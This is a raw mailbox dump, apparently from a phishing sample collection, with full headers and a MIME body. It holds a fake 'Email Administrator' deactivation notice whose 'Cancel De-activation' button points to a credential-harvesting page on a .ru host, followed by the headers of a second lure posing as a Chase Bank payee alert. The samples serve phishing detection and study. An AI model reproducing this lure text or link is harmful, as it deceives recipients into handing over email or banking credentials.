From: "Email Admin" <maziah@nanoxan.com.my>
Date: Sat, 11 Feb 2017 11:21:37 -0800
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.storeberry.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - nanoxan.com.my
X-Get-Message-Sender-Via: mail.storeberry.com: authenticated_id: testing@storeberry.com
X-Authenticated-Sender: mail.storeberry.com: testing@storeberry.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 64

You will not see this in a MIME-aware mail reader.
--===============1628627797==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



   	  =

    =

   =

 =

   Server Message =

  =


 =

   Dear jose@monkey.org  Our record indicates that you recently made a requ=
est to deactivate email And this request will be processed shortly. If this=
 request was made accidentally and you have no knowledge of it, you are adv=
ised to cancel the request now =


  =

   =

    Cancel De-activation =

  =

   =

   However, if you do not cancel this request, the your account will be de-=
activated shortly =

and all your email data will be lost permanently. Regards.
Email Administrator =


  =

   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. =

This email is meant for: &email& =

  =

	=20
--===============1628627797==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE width=3D"100%" align=3Dcenter><BR>
<TBODY>
<TR>
<TD width=3D"10%"></TD>
<TD width=3D"70%">
<TABLE style=3D"BORDER-BOTTOM: #a4a4a4 1px solid; BORDER-LEFT: #a4a4a4 1px =
solid; BORDER-TOP: #a4a4a4 1px solid; BORDER-RIGHT: #a4a4a4 1px solid" cell=
Spacing=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 width=3D"100%">
<TBODY>
<TR>
<TD bgColor=3D#045fb4 height=3D110><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT color=3D#ffffff size=3D+4 face=3Dcalibri>Server Message </FONT></=
TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8><BR><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+2 face=3Dcalibri><B>Dear jose@monkey.org</B> </FONT>
<P><FONT size=3D3 face=3Dcalibri>Our record indicates that you recently mad=
e a request to deactivate email And this request will be processed shortly. =

<P>If this request was made accidentally and you have no knowledge of it, y=
ou are advised to cancel the request now </FONT></P></TD></TR></TBODY></TAB=
LE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D15></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" bgColor=3D#045fb4 align=3Dcenter height=3D60>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none" href=3D"http://smt.m=
yjino.ru/auto ferify/auto ferify/mail.php?email=3Djose@monkey.org" target=
=3D_blank><FONT color=3D#ffffff size=3D+2 face=3Dcalibri>Cancel De-activati=
on </FONT></A></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D20></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D70>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D3 face=3Dcalibri>However, if you do not cancel this reques=
t, the your account will be de-activated shortly <BR>and all your email dat=
a will be lost permanently. =

<P>Regards.<BR><B>Email Administrator</B> </FONT></P></TD></TR></TBODY></TA=
BLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D10></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D0>
<TABLE width=3D"80%" align=3Dcenter height=3D10>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D2 face=3Dcalibri>This message is auto-generated from E-mai=
l security server, and replies sent to this email can not be delivered. <BR=
>This email is meant for: <B><FONT color=3D#045fb4>&amp;email&amp;</FONT></=
B> </FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D30></TD></TR></TBODY></TABLE></TD></TR></TBO=
DY></TABLE></TD>
<TD width=3D"20%"></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1628627797==--

From jose@monkey.org Fri Feb 10 23:30:34 2017 +0000
Return-Path: securityservicse@estarr.com
Delivered-To: jose@monkey.org
X-FDA: 72502277988.10.key96_3e8cdc9efd116
X-Spam-Summary: 64,4,0,62c209135bbaf402,d41d8cd98f00b204,securityservicse@estarr.com,:securityservicse@estarr.com,RULES_HIT:41:72:379:543:960:962:967:969:973:978:983:988:989:1189:1208:1216:1221:1254:1260:1263:1313:1314:1381:1431:1436:1437:1516:1517:1518:1535:1543:1575:1588:1589:1592:1594:1711:1714:1730:1776:1792:2145:2525:2527:2538:2543:2549:2560:2563:2682:2685:2741:2859:2890:2892:2894:2896:2900:2909:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3351:3865:3866:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4117:5007:6674:6678:6687:7652:8518:8603:8957:9010:9025:9388:9416:10012:10049:10214:10314:10400:11658:11914:12043:12114:12217:12517:12519:12561:12679:12986:13116:13132:13161:13163:13209:13229:13231:13235:13302:13437:13439:14036:14093:14181:14721:14826:14828:14849:14885:21080:21259:21325:21433:21450:21451:30001:30018:30026:30038:30051:30054:30055:30067:30069:30070:30075,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:non
X-HE-Tag: key96_3e8cdc9efd116
X-Filterd-Recvd-Size: 6323
Received: from ns0.dpdigital.net (ns0.dpdigital.net [162.144.145.148])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 10 Feb 2017 23:30:29 +0000 (UTC)
Received: from [46.20.33.215] (port=50330 helo=VM-WIN2K8-1170.appvz-dhcp)
	by ns0.dpdigital.net with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.88)
	(envelope-from <securityservicse@estarr.com>)
	id 1ccKdC-0007jb-U4; Fri, 10 Feb 2017 17:29:36 -0600
Content-Type: multipart/alternative; boundary="===============0776143420=="
MIME-Version: 1.0
Subject: .Chase.Bank.Attention: A new payee has been added
To: Recipients <securityservicse@estarr.com>
